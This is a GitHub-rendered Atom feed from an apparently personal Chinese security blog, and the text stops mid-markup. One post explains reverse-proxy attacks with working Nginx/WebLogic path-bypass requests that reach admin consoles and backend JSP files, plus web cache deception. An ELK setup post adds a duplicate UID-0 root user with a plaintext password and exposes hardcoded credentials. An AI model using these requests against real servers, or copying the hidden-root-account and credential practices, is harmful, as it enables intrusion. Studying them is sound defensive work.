-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathatom.xml
More file actions
398 lines (286 loc) · 351 KB
/
atom.xml
File metadata and controls
398 lines (286 loc) · 351 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>ru0</title>
<subtitle>记录学习点滴</subtitle>
<link href="/atom.xml" rel="self"/>
<link href="http://ruos.org/"/>
<updated>2020-01-13T08:49:31.095Z</updated>
<id>http://ruos.org/</id>
<author>
<name>ruo</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>a-fresh-look-on-reverse-proxy-related-attacks总结</title>
<link href="http://ruos.org/2020/01/13/a-fresh-look-on-reverse-proxy-related-attacks%E6%80%BB%E7%BB%93/"/>
<id>http://ruos.org/2020/01/13/a-fresh-look-on-reverse-proxy-related-attacks总结/</id>
<published>2020-01-13T03:05:15.000Z</published>
<updated>2020-01-13T08:49:31.095Z</updated>
<content type="html"><![CDATA[<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>近期对<a href="https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/" target="_blank" rel="external">A Fresh Look On Reverse Proxy Related Attacks</a> 一文进行了深入学习,根据自己的实践结果撰写笔记。</p><h3 id="反向代理如何工作?"><a href="#反向代理如何工作?" class="headerlink" title="反向代理如何工作?"></a>反向代理如何工作?</h3><p>反向代理是从互联网接收请求并转发到内网服务器,对用户而言无感知存在。一个反向代理功能包含接收请求,处理,并转发到后端。</p><p><img src="https://i.imgur.com/hgtrNef.png" alt=""></p><h4 id="a-处理请求"><a href="#a-处理请求" class="headerlink" title="a) 处理请求"></a>a) 处理请求</h4><p>代理机请求处理包含以下几个主要步骤:</p><ol><li>语法</li><li>URL 解码</li><li>路径标准化</li></ol><a id="more"></a><p>许多服务器支持常规的路径标准,如:</p><p>/long/../path/here -> /path/here<br>/long/./path/here -> /long/path/here</p><p>但是如何处理<code>/..</code>?,在Apache中它相当于<code>/../</code>,但是在Nginx中无任何作用。</p><p>/long/path/here/.. -> /long/path/ - Apache<br>/long/path/here/.. -> /long/path/here/ - Nginx</p><blockquote><p>在Apache Tomcat上同Apache</p></blockquote><p><code>//</code>空路径,Nginx将其转换成/,但是如果不在首位Apache将其作为一个真实目录对待。</p><p>//long//path//here -> /long/path/here - Nginx<br>//long/path/here -> /long/path/here - Apache<br>/long//path/here -> /long//path/here - Apache</p><blockquote><p>但是有些web servers支持一些奇怪的特性,比如Tomcat和Jetty支持<code>/..;/</code>特殊路径,或者使用<code>\..\</code>进行遍历。</p></blockquote><p>/long/path/here/..;/ -> /long/path/ - Tomcat</p><h4 id="b-应用规则"><a href="#b-应用规则" class="headerlink" title="b) 应用规则"></a>b) 应用规则</h4><p>基于路径的规则转发</p><p><a href="http://nginx.org/en/docs/http/ngx_http_core_module.html#location" target="_blank" rel="external">http://nginx.org/en/docs/http/ngx_http_core_module.html#location</a></p><h4 id="c-转发到后端"><a href="#c-转发到后端" class="headerlink" title="c) 转发到后端"></a>c) 转发到后端</h4><p>取决于代理服务器是否修改请求。</p><h3 id="案例"><a href="#案例" class="headerlink" title="案例"></a>案例</h3><h4 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h4><p>是否斜杠结尾</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">location /api/ {</div><div class="line">proxy_pass http://backend_server/;</div><div class="line"> #proxy_pass http://backend_server;</div><div class="line">}</div></pre></td></tr></table></figure><p>带斜杠<br><a href="http://domain/api/long/" target="_blank" rel="external">http://domain/api/long/</a> -> <a href="http://backend_server/long/" target="_blank" rel="external">http://backend_server/long/</a></p><p>不带斜杠<br><a href="http://domain/api/long/" target="_blank" rel="external">http://domain/api/long/</a> -> <a href="http://backend_server/api/long/" target="_blank" rel="external">http://backend_server/api/long/</a></p><p>参考:<br><a href="https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html" target="_blank" rel="external">https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html</a><br><a href="https://www.jianshu.com/p/c751250a5112" target="_blank" rel="external">https://www.jianshu.com/p/c751250a5112</a></p><h4 id="Haproxy"><a href="#Haproxy" class="headerlink" title="Haproxy"></a>Haproxy</h4><p>Haproxy通常用作负载均衡,它极少的处理请求,即不支持URL解码,协议标准化,更不支持绝对URL。</p><h3 id="服务端攻击"><a href="#服务端攻击" class="headerlink" title="服务端攻击"></a>服务端攻击</h3><h4 id="绕过限制"><a href="#绕过限制" class="headerlink" title="绕过限制"></a>绕过限制</h4><p>当攻击者想要访问某些受限功能时。</p><p>例1.</p><p>当Nginx作为反向代理,Weblogic作为后端服务器时。Nginx通过拒绝访问以<code>/console/</code>开头的路径限制管理界面。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">location /console/ {</div><div class="line">deny all;</div><div class="line">return 403;</div><div class="line">}</div><div class="line"></div><div class="line">location / {</div><div class="line">proxy_pass http://weblogic;</div><div class="line">}</div></pre></td></tr></table></figure><p>这里proxy_pass之后没有斜杠,因此请求将不处理转发到后端。但是Nginx将丢弃<code>#</code>之后的所有内容,Weblogic将<code>#</code>作为常规符号。恶意攻击者便可通过发送以下请求访问管理接口。</p><p><code>GET /#/../console/ HTTP/1.1</code></p><p>实例:访问Weblogic控制台<br><code>GET /#/../console/login/LoginForm.jsp HTTP/1.1</code></p><h4 id="请求路由错误"><a href="#请求路由错误" class="headerlink" title="请求路由错误"></a>请求路由错误</h4><h5 id="例1"><a href="#例1" class="headerlink" title="例1"></a>例1</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">location /to_app {</div><div class="line">proxy_pass http://weblogic;</div><div class="line">}</div></pre></td></tr></table></figure><p>以上配置,代理请求仅转发到Weblogic唯一后端(<a href="http://weblogic/to_app),所以只有当Nginx请求来自于/to_app时才转发到Weblogic上的相同路径。" target="_blank" rel="external">http://weblogic/to_app),所以只有当Nginx请求来自于/to_app时才转发到Weblogic上的相同路径。</a></p><p>为了访问其他目录,我们需要知道一下两点:</p><ol><li>proxy_pass配置后端没有斜杠</li><li>Weblogic支持路径参数(<a href="https://tools.ietf.org/html/rfc3986#section-3.3)" target="_blank" rel="external">https://tools.ietf.org/html/rfc3986#section-3.3)</a></li></ol><blockquote><p>区别于Tomcat的<code>/..;/..;/</code>路径遍历,Weblogic则将第一个<code>;</code>之后的所有内容作为路劲参数。</p></blockquote><p>恶意攻击者可以通过以下请求访问任意目录。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">GET /any_path_on_weblogic;/../to_app HTTP/1.1</div></pre></td></tr></table></figure><p>Nginx接收到此请求,匹配到<code>/to_app</code>规则,再将<code>/any_path_on_weblogic;/../to_app</code>转发至后端。由于特性,Weblogic认为只是在访问<code>/any_path_on_weblogic</code>路径,当然还可以在<code>;</code>之后增加/../进行深层次遍历。</p><p>实例:访问/wls-wsat/CoordinatorPortType<br><code>GET /wls-wsat/CoordinatorPortType;/../../to_app HTTP/1.1</code></p><p>实例:在Nginx只转发.do结尾的请求规则到后端时如何访问后端.jsp文件</p><p><code>GET /bea_wls_internal/.shell.jsp;/../../xx.do HTTP/1.1</code></p><h5 id="例2"><a href="#例2" class="headerlink" title="例2"></a>例2</h5><p>听说这是一个不会被修复的bug,翻译表示太难了。</p><p>当代理服务器规则为<code>location /to_app</code>时,路径<code>/to_app</code>,<code>/to_app/</code>,<code>/to_app_anything</code>(包括特殊符号)都可以匹配该规则。并且<code>/to_app</code>前缀后的字符将与proxy_pass值拼接。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">location /to_app {</div><div class="line">proxy_pass http://server/any_path/;</div><div class="line">}</div></pre></td></tr></table></figure></p><p>在以上配置中,如果我们发起<code>/to_app_anything</code>访问请求,代理服务器将转发<code>http://server/any_path/_anything</code>到后端。<br>结合这些特性,恶意攻击者几乎可以通过以下方式遍历后端任意路径。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">GET /to_app../other_path HTTP/1.1 -> http://server/any_path/../other_path</div></pre></td></tr></table></figure></p><p>实例:访问Weblogic后端console<br><code>GET /to_app1../console/login/LoginForm.jsp HTTP/1.1</code></p><h5 id="例3"><a href="#例3" class="headerlink" title="例3"></a>例3</h5><p>在某些情况,反向代理服务器根据主机头将请求路由到不同的后端。以Haproxy为例,因为其不能处理绝对URI,便可以通过以下方式访问后端任意主机。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">GET http://unsafe-value/path/ HTTP/1.1</div><div class="line">Host: example1.com</div></pre></td></tr></table></figure></p><p>不过在大部分情况下(Nginx, Haproxy, Varnish)这是不能做到的,但是Apache在某些配置版本下则可以。由于此漏洞(CVE-2011-3368)太老,我们不再深入研究,这里提供以下两个链接参考。</p><p><a href="https://www.exploit-db.com/exploits/17969" target="_blank" rel="external">https://www.exploit-db.com/exploits/17969</a><br><a href="https://www.contextis.com/de/blog/server-technologies-reverse-proxy-bypass" target="_blank" rel="external">https://www.contextis.com/de/blog/server-technologies-reverse-proxy-bypass</a><br><a href="https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf" target="_blank" rel="external">https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf</a></p><h3 id="客户端攻击"><a href="#客户端攻击" class="headerlink" title="客户端攻击"></a>客户端攻击</h3><h4 id="Web缓存欺骗-Web-Cache-Deception"><a href="#Web缓存欺骗-Web-Cache-Deception" class="headerlink" title="Web缓存欺骗 Web Cache Deception"></a>Web缓存欺骗 Web Cache Deception</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"># Nginx缓存配置</div><div class="line">proxy_cache_path /temp levels=1:2 keys_zone=my_cache:10m inactive=120s;</div><div class="line">location ~ .*\.(gif|jpg|png|css|js)(.*) {</div><div class="line"> proxy_cache my_cache;</div><div class="line"> proxy_pass http://30.3.228.163:7041;</div><div class="line"> proxy_cache_valid 200 302 60m;</div><div class="line"> proxy_set_header X-Real-IP $remote_addr;</div><div class="line"> proxy_ignore_headers Cache-Control Expires Set-Cookie;</div><div class="line"> add_header Nginx-Cache "$upstream_cache_status";</div><div class="line">}</div></pre></td></tr></table></figure><p>以上配置使得Nginx将缓存指定扩展名文件内容,当我们访问诸如<code>/home.php/nonexistent.css</code>链接时响应内容与访问<code>/home.php</code>相同,Nginx将缓存当前页面信息,恶意攻击者通过访问<code>/home.php/nonexistent.css</code>获取用户敏感信息。</p><p>参考资料<br><a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack-wp.pdf" target="_blank" rel="external">https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack-wp.pdf</a><br><a href="http://omergil.blogspot.ru/2017/02/web-cache-deception-attack.html" target="_blank" rel="external">http://omergil.blogspot.ru/2017/02/web-cache-deception-attack.html</a></p><h4 id="Web缓存中毒-Practical-Web-Cache-Poisoning"><a href="#Web缓存中毒-Practical-Web-Cache-Poisoning" class="headerlink" title="Web缓存中毒 Practical Web Cache Poisoning"></a>Web缓存中毒 Practical Web Cache Poisoning</h4><p>通过添加X-Forwarded-Host (XFH)头观察是否在返回包中回显。</p><blockquote><p>反向代理(如负载均衡服务器、CDN等)的域名或端口号可能与处理请求的源服务器有所不同,X-Forwarded-Host 用来确定哪一个域名是最初被用来访问的。</p></blockquote><p><a href="https://i.blackhat.com/us-18/Thu-August-9/us-18-Kettle-Practical-Web-Cache-Poisoning-Redefining-Unexploitable.pdf" target="_blank" rel="external">https://i.blackhat.com/us-18/Thu-August-9/us-18-Kettle-Practical-Web-Cache-Poisoning-Redefining-Unexploitable.pdf</a></p><h5 id="HTTP响应拆分(CRLF注入)"><a href="#HTTP响应拆分(CRLF注入)" class="headerlink" title="HTTP响应拆分(CRLF注入)"></a>HTTP响应拆分(CRLF注入)</h5><p>-|-|-<br>CR|回车|\r|%0d<br>LF|换行|\n|%oa</p><p>客户端浏览器通过\r\n来区分http协议的header和body,一旦我们能够控制响应头中的字符,就能修改浏览器解析结果,从而实现恶意行为。</p><h5 id="请求走私-HTTP-Request-Smuggler"><a href="#请求走私-HTTP-Request-Smuggler" class="headerlink" title="请求走私 HTTP Request Smuggler"></a>请求走私 HTTP Request Smuggler</h5><p><a href="https://paper.seebug.org/1048/?from=timeline&isappinstalled=0" target="_blank" rel="external">https://paper.seebug.org/1048/?from=timeline&isappinstalled=0</a></p>]]></content>
<summary type="html">
<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>近期对<a href="https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/" target="_blank" rel="external">A Fresh Look On Reverse Proxy Related Attacks</a> 一文进行了深入学习,根据自己的实践结果撰写笔记。</p>
<h3 id="反向代理如何工作?"><a href="#反向代理如何工作?" class="headerlink" title="反向代理如何工作?"></a>反向代理如何工作?</h3><p>反向代理是从互联网接收请求并转发到内网服务器,对用户而言无感知存在。一个反向代理功能包含接收请求,处理,并转发到后端。</p>
<p><img src="https://i.imgur.com/hgtrNef.png" alt=""></p>
<h4 id="a-处理请求"><a href="#a-处理请求" class="headerlink" title="a) 处理请求"></a>a) 处理请求</h4><p>代理机请求处理包含以下几个主要步骤:</p>
<ol>
<li>语法</li>
<li>URL 解码</li>
<li>路径标准化</li>
</ol>
</summary>
</entry>
<entry>
<title>ELK</title>
<link href="http://ruos.org/2019/03/19/ELK/"/>
<id>http://ruos.org/2019/03/19/ELK/</id>
<published>2019-03-19T02:01:30.000Z</published>
<updated>2019-08-09T06:02:19.248Z</updated>
<content type="html"><![CDATA[<h2 id="指南"><a href="#指南" class="headerlink" title="指南"></a>指南</h2><p><a href="https://elkguide.elasticsearch.cn/logstash/get-start/install.html" target="_blank" rel="external">https://elkguide.elasticsearch.cn/logstash/get-start/install.html</a></p><h2 id="架构"><a href="#架构" class="headerlink" title="架构"></a>架构</h2><p>Elasticsearch 实时全文搜索和分析引擎<br>Logstash 日志收集,分析,过滤<br>Kibana 数据图形化展示</p><p><img src="http://static.open-open.com/news/uploadImg/20150716/20150716205233_183.png" alt=""></p><p>Server(producer) Beats -> Zookeeper Kafka topic -> (按照业务功能拆分ELK cluster) Logstash (consumer) -> ES -> Kibana (日志敏感信息泄露)</p><p>服务器<br>/etc/hosts<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">30.3.229.120 develk01</div><div class="line">30.3.229.121 develk02</div><div class="line">30.3.229.122 develk03</div><div class="line">30.3.229.123 devkafka01</div><div class="line">30.3.229.124 devkafka02</div><div class="line">30.3.229.125 devkafka03</div></pre></td></tr></table></figure></p><p>添加root用户<br>useradd -u 0 -o -g root -G root -d /root/ user1<br>echo “user1”:”passw0rD” | chpasswd</p><a id="more"></a><h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>升级java至1.8</p><p>卸载低版本java<br>rpm -qa | grep jdk<br>yum -y remove jdk-1.7.0_79-fcs.x86_64<br>yum -y list java*<br>yum -y install java-1.8.0-openjdk.x86_64<br>rpm -i jdk-8u171-linux-x64.rpm<br>rpm -qa | grep logstash<br>rpm -e –nodeps logstash-5.6.10-1.noarch</p><p>版本选择</p><p>Beats<br>Elasticsearch<br>Elasticsearch Hadoop<br>Kibana<br>Logstash<br>X-Pack</p><h3 id="Elasticsearch"><a href="#Elasticsearch" class="headerlink" title="Elasticsearch"></a>Elasticsearch</h3><p>/etc/elasticsearch/elasticsearch.yml # els的配置文件<br>/etc/elasticsearch/jvm.options # JVM相关的配置,内存大小等等<br>/etc/elasticsearch/log4j2.properties # 日志系统定义<br>/var/lib/elasticsearch # 数据的默认存放位置</p><p>集群配置</p><p>/etc/elasticsearch/elasticsearch.yml </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">cluster.name: elk-cluster</div><div class="line">node.name: ${HOSTNAME}</div><div class="line">#node.master: true</div><div class="line">#node.data: true</div><div class="line">network.host: 0.0.0.0</div><div class="line">http.port: 9200</div><div class="line">path.data: /data/els/data</div><div class="line">path.logs: /data/els/logs</div><div class="line">bootstrap.memory_lock: false</div><div class="line">bootstrap.system_call_filter: false</div><div class="line">network.host: 0.0.0.0</div><div class="line">http.port: 9200</div><div class="line">discovery.zen.ping.unicast.hosts: ["devekl01", "develk02","develk03"]</div><div class="line">discovery.zen.minimum_master_nodes: 2</div></pre></td></tr></table></figure><p>/etc/security/limits.conf</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">* soft nofile 65536</div><div class="line">* hard nofile 65536</div></pre></td></tr></table></figure><p>启动报错</p><p>Java HotSpot(TM) 64-Bit Server VM warning: INFO: os::commit_memory(0x0000000085330000, 2060255232, 0) failed; error=’Cannot allocate memory’ (errno=12)</p><p>/etc/elasticsearch/jvm.options</p><p>-Xms512m<br>-Xmx512m</p><p>[2]: max number of threads [1832] for user [elasticsearch] is too low, increase to at least [2048]</p><p>ulimit -u 2048</p><p>创建数据目录<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">rm -rf /data/</div><div class="line">mkdir -p /data/els/{logs,data}</div><div class="line">chown -R elasticsearch.elasticsearch /data/*</div><div class="line">service elasticsearch start`</div><div class="line">or</div><div class="line">bin/elasticsearch -d</div></pre></td></tr></table></figure></p><p>查看节点</p><p><a href="http://30.3.229.120:9200/_cat/nodes?pretty" target="_blank" rel="external">http://30.3.229.120:9200/_cat/nodes?pretty</a></p><h4 id="常用操作"><a href="#常用操作" class="headerlink" title="常用操作"></a>常用操作</h4><p>查看索引<br><code>curl http://localhost:9200/_cat/indices?v</code></p><p>删除索引<br><code>curl -u elastic:changeme -XDELETE http://localhost:9200/my_index</code></p><p>/_cat/health?v<br>/_cat/nodes?v </p><p>安装x-pack<br><code>bin/elasticsearch-plugin install x-pack</code></p><p>修改x-pack默认密码<br><code>curl -XPUT -u elastic 'localhost:9200/_xpack/security/user/elastic/_password' -d '{"password" : "dfh*&(dUJ"}'</code></p><h4 id="elasticsearch-head-监控"><a href="#elasticsearch-head-监控" class="headerlink" title="elasticsearch-head 监控"></a>elasticsearch-head 监控</h4><p>yum install nodejs<br>yum install npm<br>npm install -g grunt-cli<br>git config –global https.proxy <a href="http://127.0.0.1:1080" target="_blank" rel="external">http://127.0.0.1:1080</a><br>git clone git://github.com/mobz/elasticsearch-head.git<br>npm config set strict-ssl false<br>npm config set registry <a href="https://registry.npm.taobao.org" target="_blank" rel="external">https://registry.npm.taobao.org</a><br>npm config set proxy <a href="http://127.0.0.1:1080" target="_blank" rel="external">http://127.0.0.1:1080</a><br>npm info express<br>npm install<br>grunt server</p><p>后台运行<br>nohup grunt server &</p><p><a href="http://localhost:9100" target="_blank" rel="external">http://localhost:9100</a></p><h3 id="Logstash"><a href="#Logstash" class="headerlink" title="Logstash"></a>Logstash</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">[logstash-5.x]</div><div class="line">name=Elastic repository for 5.x packages</div><div class="line">baseurl=https://artifacts.elastic.co/packages/5.x/yum</div><div class="line">gpgcheck=1</div><div class="line">gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch</div><div class="line">enabled=1</div><div class="line">autorefresh=1</div><div class="line">type=rpm-md</div></pre></td></tr></table></figure><p>/etc/logstash/conf.d/elk.conf</p><p>input –> filter –> output</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line"> syslog {</div><div class="line"> syslog_field => "syslog" # default message</div><div class="line"> port => 514</div><div class="line"> }</div><div class="line"> beats {</div><div class="line"> port => 5044</div><div class="line"> }</div><div class="line">}</div><div class="line">filter {</div><div class="line">}</div><div class="line">output {</div><div class="line"> elasticsearch {</div><div class="line"> hosts => ["192.168.200.109:9200"]</div><div class="line"> index => "test-%{+YYYY.MM}" </div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure><p>启动logstash<br><code>nohup bin/logstash --debug --path.settings /etc/logstash/ -f config/test.conf > ls.log 2>&1 &</code><br>多实例<br>bin/logstash -f config/syslog.conf –path.data=/tmp</p><p><a href="https://www.elastic.co/guide/en/logstash/5.6/config-examples.html" target="_blank" rel="external">https://www.elastic.co/guide/en/logstash/5.6/config-examples.html</a></p><p>写入kafka<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line">stdin{}</div><div class="line">}</div><div class="line">output {</div><div class="line"> kafka {</div><div class="line"> topic_id => "test"</div><div class="line"> codec => plain {</div><div class="line"> format => "%{message}"</div><div class="line"> charset => "UTF-8"</div><div class="line"> }</div><div class="line"> bootstrap_servers => "192.168.6.22:9092"</div><div class="line"> }</div><div class="line"> stdout{</div><div class="line"> codec => rubydebug</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p><p>读取kafka<br>区别于低版本,5.0后的版本连接kafka实例地址,而非zk。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">input{</div><div class="line"> kafka{</div><div class="line"> bootstrap_servers => ["192.168.6.22:9092"]</div><div class="line"> #client_id => "test"</div><div class="line"> group_id => "test"</div><div class="line"> auto_offset_reset => "latest"</div><div class="line"> consumer_threads => 5</div><div class="line"> decorate_events => true</div><div class="line"> topics => ["test"]</div><div class="line"> }</div><div class="line">}</div><div class="line">output{</div><div class="line">elasticsearch { </div><div class="line">hosts => ["127.0.0.1:9200"] </div><div class="line">index => "test-%{+YYYY.MM}"</div><div class="line">user => 'elastic'</div><div class="line">password => 'changeme'</div><div class="line"></div><div class="line">}</div><div class="line"> stdout{</div><div class="line"> codec => rubydebug</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p><p>多进程</p><p>bin/logstash -f config/rsyslog.conf –path.data=/tmp</p><p>安装x-pack监控<br>logstash-plugin install file:///tmp/x-pack-5.6.10.zip</p><p>nano config/logstash.yml </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">xpack.monitoring.elasticsearch.url: ["http://10.2.0.27:9200"] </div><div class="line">xpack.monitoring.elasticsearch.username: "elastic" </div><div class="line">xpack.monitoring.elasticsearch.password: "dfh*&(dUJ"</div><div class="line">xpack.monitoring.enabled: true</div><div class="line">xpack.monitoring.collection.interval: 10s</div></pre></td></tr></table></figure><h3 id="Kafka"><a href="#Kafka" class="headerlink" title="Kafka"></a>Kafka</h3><p>Topic<br>Kafka将消息种子(Feed)分门别类 每一类的消息称之为话题(Topic).<br>Producer<br>发布消息的对象称之为话题生产者(Kafka topic producer)<br>Consumer<br>订阅消息并处理发布的消息的种子的对象称之为话题消费者(consumers)<br>Broker<br>已发布的消息保存在一组服务器中称之为Kafka集群。集群中的每一个服务器都是一个代理(Broker). 消费者可以订阅一个或多个话题并从Broker拉数据从而消费这些已发布的消息。</p><p>由于broker采用了主题topic–>分区的思想,使得某个分区内部的顺序可以保证有序性,但是分区间的数据不保证有序性。这样,消费者可以以分区为单位,自定义读取的位置——offset。</p><p>兼容性<br>如果使用logstash 5.x 则相应的kafka版本选择0.10.0.x<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"># |==========================================================</div><div class="line"># |Kafka Client Version |Logstash Version |Plugin Version |Why?</div><div class="line"># |0.8 |2.0.0 - 2.x.x |<3.0.0 |Legacy, 0.8 is still popular </div><div class="line"># |0.9 |2.0.0 - 2.3.x | 3.x.x |Works with the old Ruby Event API (`event['product']['price'] = 10`) </div><div class="line"># |0.9 |2.4.x - 5.x.x | 4.x.x |Works with the new getter/setter APIs (`event.set('[product][price]', 10)`)</div><div class="line"># |0.10.0.x |2.4.x - 5.x.x | 5.x.x |Not compatible with the <= 0.9 broker</div><div class="line"># |==========================================================</div></pre></td></tr></table></figure></p><p>wget <a href="http://mirrors.hust.edu.cn/apache/kafka/0.11.0.2/kafka-0.11.0.2-src.tgz" target="_blank" rel="external">http://mirrors.hust.edu.cn/apache/kafka/0.11.0.2/kafka-0.11.0.2-src.tgz</a></p><p>配置 server.properties<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">broker.id=0</div><div class="line">listeners=PLAINTEXT://kafka01:9092</div><div class="line">advertised.listeners=PLAINTEXT://kafka01:9092</div></pre></td></tr></table></figure></p><p>修改启动脚本jvm内存使用大小<br><code>export KAFKA_HEAP_OPTS="-Xmx512M -Xms256M"</code></p><p>启动服务<br><code>nohup bin/zookeeper-server-start.sh config/zookeeper.properties > zk.out 2>&1 &</code><br><code>nohup bin/kafka-server-start.sh config/server.properties > kafka.out 2>&1 &</code></p><p><code>bin/kafka-server-start.sh -daemon config/server.properties</code></p><p>自动创建topoic<br><code>bin/kafka-console-producer.sh --broker-list localhost:9092 --topic test</code></p><p>查看已创建的topic<br><code>bin/kafka-topics.sh --list --zookeeper localhost:2181</code></p><p>查看test topic详情<br><code>bin/kafka-topics.sh --describe --zookeeper localhost:2181 --topic test</code></p><p>删除topic<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div 